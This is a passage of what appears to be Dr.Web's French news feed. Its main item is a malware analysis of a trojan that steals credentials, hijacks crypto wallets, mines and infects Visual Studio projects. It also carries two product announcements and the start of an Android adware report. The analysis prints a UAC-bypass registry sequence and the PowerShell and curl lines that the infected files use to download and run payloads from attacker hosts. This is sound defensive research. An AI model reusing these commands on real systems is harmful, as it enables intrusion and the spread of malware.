créés par les attaquants contiennent le nom de domaine en clair.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Compte Steam avec le domaine C2&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Sur GitHub, les attaquants ont enregistré l'adresse de domaine C2 chiffrée sous forme de fichier raw&amp;nbsp;: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. Le cheval de Troie télécharge ce fichier et le déchiffre d'abord via Base64 puis en utilisant l'opération XOR avec la clé ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Domaines cryptés&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Après avoir téléchargé l'étape suivante,&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.DownLoader49.35687&amp;lng=fr"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;l'injecte dans le processus de l'un des 41 fichiers exécutables prédéfinis de &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;L'adresse du domaine C2 avec lequel la communication a été établie est ajoutée aux chaînes intégrées dans le cheval de Troie et transmise à l'étape suivante via le canal nommé pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Étape 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;C’est à cette étape que se déroule l’activité malveillante principale. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; crée un objet de synchronisation mutex avec un nom fixe de la forme Global\PFNX_Side(valeur fixe). Ensuite, via un canal créé précédemment, le cheval de Troie reçoit des données de la deuxième étape, à partir desquelles il extrait les identifiants du cheval de Troie et le domaine C2 avec lequel &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; communiquera.&lt;/p&gt;&lt;p&gt;Pour prendre pied dans le système, le cheval de Troie télécharge le fichier «&amp;nbsp;bungee.boo&amp;nbsp;», qui remplit les fonctions de l'étape 2&amp;nbsp;-&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.DownLoader49.35687&amp;lng=fr"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, et remplace les fichiers DLL par celui-ci&amp;nbsp;:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;«profapi.dll» de l'application Discord,&lt;/li&gt;&lt;li&gt;«domain_actions.dll» dans le dossier «Domain Actions» et «well_known_domains.dll» dans le dossier «Well Known Domains» de l'application Microsoft Edge,&lt;/li&gt;&lt;li&gt;«C:\Windows\omadmapi.dll».&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;De plus, &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; peut modifier le registre système Windows de telle sorte que du code malveillant soit exécuté lors de l'ouverture de fichiers archivés à l'aide de WinRar.exe.&lt;/p&gt;&lt;p&gt;Pour fonctionner avec les privilèges d'administrateur, le cheval de Troie utilise une technique de contournement du contrôle de compte d'utilisateur (UAC). Le logiciel malveillant génère un fichier .vbs dont le nom est composé de chiffres aléatoires et qui contient une commande à exécuter avec les privilèges d'administrateur. Ensuite, les commandes suivantes sont exécutées via cmd.exe&amp;nbsp;:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Le cheval de Troie met ensuite en œuvre cinq fonctions malveillantes&amp;nbsp;: stealer, clipper, porte dérobée, minage de cryptomonnaie et source d'infection de fichiers.&lt;/p&gt;&lt;h3&gt;Stealer&lt;/h3&gt;&lt;p&gt;Le cheval de Troie est capable de voler diverses informations&amp;nbsp;:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;les jetons Discord, qui permettent d’accéder à d’autres comptes sans saisir d’identifiant ni de mot de passe&amp;nbsp;;&lt;/li&gt;&lt;li&gt;les mots de passe et les cookies de Chrome, Edge, Opera, Brave, Yandex et autres navigateurs. A part les techniques d'extraction de données classiques, il peut utiliser le fichier CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). Il s'intègre au navigateur, puis lit les mots de passe et les enregistre dans des fichiers texte.&lt;/li&gt;&lt;li&gt;dossiers Telegram Desktop&amp;nbsp;;&lt;/li&gt;&lt;li&gt;dossiers du portefeuille crypto Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Outre le vol des dossiers Exodus, le cheval de Troie modifie également le portefeuille crypto. Pour ce faire, il localise le fichier app.asar et le remplace par une copie téléchargée depuis l'URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; à l'aide de curl. La version remplacée dans index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) contient la fonction unlock() qui, lorsqu'elle est exécutée, envoie des phrases mnémoniques du portefeuille au serveur des attaquants.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Fichier index.js remplacé&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Clipper&lt;/h3&gt;&lt;p&gt;Une fonction particulièrement dangereuse du cheval de Troie. Le logiciel malveillant surveille en permanence le presse-papiers de l'utilisateur, à la recherche d'informations bancaires, et les envoie au serveur des attaquants. Il remplace également les adresses des portefeuilles de cryptomonnaies par de fausses adresses reçues du serveur de commande et de contrôle (C2).&lt;/p&gt;&lt;h3&gt;Porte dérobée&lt;/h3&gt;&lt;p&gt;Les fonctionnalités du cheval de Troie permettent aux attaquants de contrôler à distance un PC infecté à l'aide des commandes suivantes&amp;nbsp;:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;Télécharger le fichier depuis une URL avec curl et l'exécuter&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;lancer Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;exécuter la commande via cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;télécharger le contenu d'un fichier spécifique vers le serveur de commande&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;envoyer une liste de fichiers d'un répertoire spécifique vers le serveur de commande&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;exécutez une commande pour troller l'utilisateur. Options disponibles&amp;nbsp;: earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer etc.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Miner&lt;/h3&gt;&lt;p&gt;Le cheval de Troie utilise curl pour télécharger du serveur et exécuter le fichier &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. Sa structure et ses actions sont similaires à celles de l'étape 2, mais au lieu de &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;, il télécharge et installe &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Ce miner ne se lance qu'après une période d'inactivité de l'utilisateur. Ce malware utilise les outils open source &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; et &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;Contamination de fichiers&lt;/h3&gt;&lt;p&gt;La principale caractéristique de ce cheval de Troie est sa capacité à infecter des fichiers puis à se propager de manière autonome. Liste des fichiers infectés&amp;nbsp;:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj et .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Pour déterminer les chemins d'accès aux fichiers susceptibles d'être infectés, le cheval de Troie analyse des disques et exécute une commande. Exemple pour le lecteur A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Les attaquants comptent sur le fait que les développeurs publieront leurs projets contenant du code malveillant dans le domaine public. Les autres développeurs qui créent, compilent ou modifient le projet infecteront automatiquement leurs ordinateurs à cause des fichiers .suo, .vcxproj et .csproj, et les utilisateurs ordinaires pourront exécuter des exécutables infectés créés à l'aide d'outils de développement compromis.&lt;/p&gt;&lt;h3&gt;Fichier imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;Le fichier &lt;span class="string"&gt;imgui_impl_win32.cpp&lt;/span&gt; fait partie de la populaire bibliothèque Dear ImGui, qui est resposable de l'interface graphique pour le langage de programmation C++. Le cheval de Troie injecte deux chaînes dans le fichier&amp;nbsp;: la première contient une charge utile, la seconde la lance.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Ligne de code contenant la charge utile&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Ligne de code qui exécute la charge utile&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Résultat - commande&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;La bibliothèque est donc infectée, et toute application C++ créée par l'utilisateur contiendra du code malveillant. Lorsque ces applications seront partagées ou téléchargées, l'infection se propagera.&lt;/p&gt;&lt;h3&gt;Fichiers .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;Il s'agit d'une extension de fichier pour l'environnement de développement Microsoft Visual Studio. Ces fichiers stockent les paramètres utilisateur de projets spécifiques. Le cheval de Troie remplace le fichier original par un fichier infecté obtenu depuis un serveur de commande et de contrôle (C2).&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Fichier contaminé&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Par conséquent, un code malveillant est exécuté lorsque le projet est ouvert dans Visual Studio&amp;nbsp;:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;Fichiers winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Le kit de développement logiciel (SDK) Windows est l'outil officiel de Microsoft pour la création d'applications pour le système d'exploitation Windows.&lt;/p&gt;&lt;p&gt;Le cheval de Troie utilise le registre pour localiser le dossier d'installation du SDK Windows. Le fichier &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, responsable de la gestion des ressources réseau, est recherché dans ce dossier. Du code malveillant y est ensuite ajouté.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Fichier contaminé winnetwk.h&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Après cela, tous les programmes créés à l'aide de winnetwk.h contiendront du code malveillant qui déclenchera la deuxième étape.&lt;/p&gt;&lt;h3&gt;Fichiers .exe&lt;/h3&gt;&lt;p&gt;Le cheval de Troie recherche les fichiers .exe appropriés et y injecte des fonctions d'initialisation de l'API et de lancement initterm. Puis, le fichier commence à fonctionner comme&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.DownLoader49.35384&amp;lng=fr"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, également appelé étape 1.&lt;/p&gt;&lt;h3&gt;Fichiers .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) et .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Il s'agit de fichiers de projet Visual Studio écrits en C++ et C#. La commande PreBuildEvent s'y ajoute, et elle s'exécute avant chaque compilation du projet. Les versions précédentes du cheval de Troie intégraient un code similaire à celui de la première étape.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Version précédente du code&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dans les versions plus récentes, le code est devenu plus complexe et des mécanismes d'obfuscation supplémentaires ont été ajoutés.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Nouvelle version du code&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Une des étapes d'exécution du cheval de Troie &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;La commande malveillante assure l'enregistrement du fichier .vbs malveillant qui, à son tour, lance la charge utile (payload) PowerShell. Le cheval de Troie effectue une requête aux URL suivantes&amp;nbsp;:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Ces adresses stockent une autre URL, chiffrée en base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Compte YouTube avec URL chiffrée&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Après le déchiffrement, le cheval de Troie obtient un domaine C2 auquel il accède pour exécuter une charge utile similaire à celle de la deuxième étape.&lt;/p&gt;&lt;p&gt;La description du fonctionnement du cheval de Troie indique qu'il représente une menace accrue en raison de la combinaison de plusieurs fonctions malveillantes. Pour prévenir l'infection de votre ordinateur et la propagation du cheval de Troie, nous vous recommandons de mettre à jour régulièrement les bases de données de votre antivirus et d'analyser tous les fichiers téléchargés depuis Internet. Les utilisateurs de &lt;a href="https://products.drweb.fr/win/security_space/" target="_blank" rel="noopener"&gt;Dr.Web Security Space&lt;/a&gt; et de &lt;a href="https://products.drweb.fr/workstations/" target="_blank" rel="noopener"&gt;Dr.Web Desktop Security Suite&lt;/a&gt; n‘ont pas à s'inquiéter&amp;nbsp;: le cheval de Troie est détecté et supprimé efficacement par le logiciel antivirus Dr.Web. Les fichiers tels que .vcxproj, .csproj et imgui peuvent être désinfectés, et le code malveillant qu'ils contiennent sera supprimé.&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15266&amp;lng=fr</guid><title>Nous y sommes enfin ! Dr.Web CureIt! Pro est désormais disponible gratuitement pour tous.</title><link>https://news.drweb.fr/show/?i=15266&amp;lng=fr&amp;c=5</link><pubDate>Tue, 23 Jun 2026 11:55:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Découvrez Dr.Web CureIt! Pro — la version étendue de l’utilitaire antivirus. &amp;nbsp;La version est déjà disponible et vous pouvez bénéficier gratuitement d’un accès promotionnel dès maintenant.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Comment obtenir gratuitement Dr.Web CureNet! Pro ?&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Pour les nouveaux utilisateurs&lt;/strong&gt;. Rendez-vous sur le site &lt;a href="https://free.drweb.fr/download+cureit+free/?lng=fr"&gt;free.drweb.fr&lt;/a&gt;. Remplissez le formulaire standard pour recevoir Dr.Web CureIt! et obtenez un lien pour télécharger Dr.Web CureIt! Pro avec une licence pour 1 jour. Aucun coût caché : il vous suffit de remplir le formulaire et de traiter votre ordinateur en utilisant les paramètres avancés.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Pour les utilisateurs actuels de la version payante de Dr.Web CureIt!&lt;/strong&gt; &amp;nbsp;Connectez-vous à votre espace personnel pour télécharger le package d'installation de Dr.Web CureIt! Pro. Téléchargez-le et utilisez-le sans aucune limitation pendant toute la durée de votre licence.&lt;/p&gt;&lt;p&gt;Pour rappel, la version Pro vous offre des paramètres d'analyse flexibles, la gestion des exclusions, l'attribution manuelle d'actions aux menaces ainsi que des statistiques avancées.&lt;/p&gt;&lt;p&gt;Attention ! L'accès promotionnel gratuit d'une journée via le site &lt;a href="https://free.drweb.fr/download+cureit+free/?lng=fr"&gt;free.drweb.fr&lt;/a&gt; est une offre spéciale qui vous permet de profiter de tous les avantages de la version Pro sans frais. &amp;nbsp; L'offre est valable jusqu'au 30 juin 2026 inclus.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;À compter du 1er juillet 2026, les options suivantes seront disponibles :&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;La version classique gratuite de Dr.Web CureIt! pour le téléchargement et les traitements d’urgence ;&lt;/li&gt;&lt;li&gt;La version étendue de Dr.Web CureIt! Pro.&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Avez-vous des questions ou avez-vous remarqué un comportement inhabituel du logiciel ? Votre avis est très important pour nous. Veuillez publier vos commentaires et suggestions dans le fil &lt;a href="https://forum.drweb.com/index.php?showforum=92"&gt;de discussion dédié &lt;/a&gt;sur notre forum officiel.&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Téléchargez Dr.Web CureIt! Pro dès aujourd'hui et profitez d’un contrôle total sur l’analyse et le traitement des menaces grâce à des paramètres avancés !&amp;nbsp;&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15268&amp;lng=fr</guid><title>Dr.Web CureIt! devient encore plus pratique. Annonce de la nouvelle version étendue Pro</title><link>https://news.drweb.fr/show/?i=15268&amp;lng=fr&amp;c=5</link><pubDate>Wed, 10 Jun 2026 09:50:40 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Nous avons analysé les retours de nos utilisateurs et tiré une conclusion importante&amp;nbsp;: lorsqu’un ordinateur est infecté, personne n’a besoin de paramètres complexes. &amp;nbsp;Il faut avant tout une solution rapide, simple et fiable qui s'exécute et nettoie le système en un seul clic.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;C’est pourquoi nous avons repensé l'utilisation de notre utilitaire. La version gratuite de Dr.Web CureIt! reste disponible, mais elle se concentre désormais davantage sur l'essentiel : il suffit de le télécharger, de cliquer sur « Scanner », et c'est tout. Il s'agit d'un scanner ultra-rapide et fiable pour les interventions d'urgence, capable de neutraliser les menaces actives et de réparer le système.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Et pour ceux qui ont besoin de contrôler le processus ?&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Les fonctionnalités avancées n’ont pas disparu. Au contraire, nous les avons regroupés dans un produit dédié : Dr.Web CureIt! Pro, afin de les rendre encore plus accessible et plus pratiques à utiliser.&lt;br&gt;Que vous ayez besoin d'analyser des supports amovibles, d'exclure des dossiers de l'analyse ou de configurer des actions automatiques pour les menaces détectées, vous bénéficiez d'un scanner flexible et entièrement fonctionnel à un prix minimal.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Comment cela fonctionne-t-il ?&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Simple et gratuit : téléchargez la version standard de Dr.Web CureIt! et lancez instantanément une analyse express. C’est la solution idéale lorsque chaque seconde compte.&lt;/li&gt;&lt;li&gt;Besoin de fonctionnalités supplémentaires&amp;nbsp;? Achetez Dr.Web CureIt! Pro sur notre site web ou directement depuis la version gratuite et accédez à l’ensemble des paramètres avancés.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Vous choisissez ainsi la formule qui vous convient le mieux : la simplicité – avec la version gratuite, ou une flexibilité maximale pour seulement 5 Euros pour 5 jours, ou 10 Euros pour 10 jours.&lt;br&gt;La sortie de Dr.Web CureIt! Pro est prévue pour début juillet. Afin de vous permettre de découvrir toutes ses fonctionnalités avant son lancement, l’ensemble des options Pro sera accessible gratuitement à tous les utilisateurs durant la semaine précédant sa sortie.&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15262&amp;lng=fr</guid><title>Le cheval de Troie Android.MagicAd affiche des publicités malgré toutes les restrictions</title><link>https://news.drweb.fr/show/?i=15262&amp;lng=fr&amp;c=5</link><pubDate>Fri, 05 Jun 2026 16:20:41 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Les spécialistes du laboratoire antivirus de Doctor Web ont découvert le cheval de Troie Android.MagicAd, qui contourne les restrictions du système d'exploitation Android de différentes manières et affiche des publicités lorsqu'il s'exécute en arrière-plan. L'une de ces méthodes est universelle, tandis que d'autres sont conçues pour des appareils de fabricants spécifiques. Parmi celles-ci, l'utilisation d'applications tierces et du lecteur multimédia système.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; a été distribué via la boutique d'applications officielle Xiaomi GetApps, ce Trojan a été caché dans plus de 50 jeux et programmes différents. Ils apparaissaient dans la boutique en ligne pour une courte durée&amp;nbsp;– généralement un mois maximum, avant d’être retirés et remplacés par de nouveaux programmes. Il s'agissait peut-être d'une tentative des pirates de protéger &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; contre une détection prématurée tout en maintenant son activité. En effet, même après leur suppression de la boutique, les applications infectées restent installées sur les appareils des utilisateurs et peuvent continuer à exécuter des activités malveillantes. Actuellement, aucune des applications que nous avons identifiées et qui contenaient &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; n'est disponible en téléchargement dans le catalogue GetApps, et les développeurs qui les ont distribuées ont cessé de créer de nouveaux programmes contenant le cheval de Troie.
&lt;/p&gt;

&lt;p&gt;Une étude menée par les analystes de Doctor Web a révélé que les premières versions d'&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; sont apparues en 2025. Outre le catalogue GetApps, elles ont également été trouvées dans le Samsung Galaxy Store.&lt;/p&gt;

&lt;div class="img img-two"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/01_Android.MagicAd_store_1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/may/android_magic_ad/02_Android.MagicAd_store_2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;Exemples de jeux et de programmes du catalogue GetApps ayant contenu Android.MagicAd.1. Au moment de la publication de notre article, ces modifications du cheval de Troie, ainsi que d'autres, ne sont plus disponibles au téléchargement.&lt;/i&gt;&lt;/p&gt;

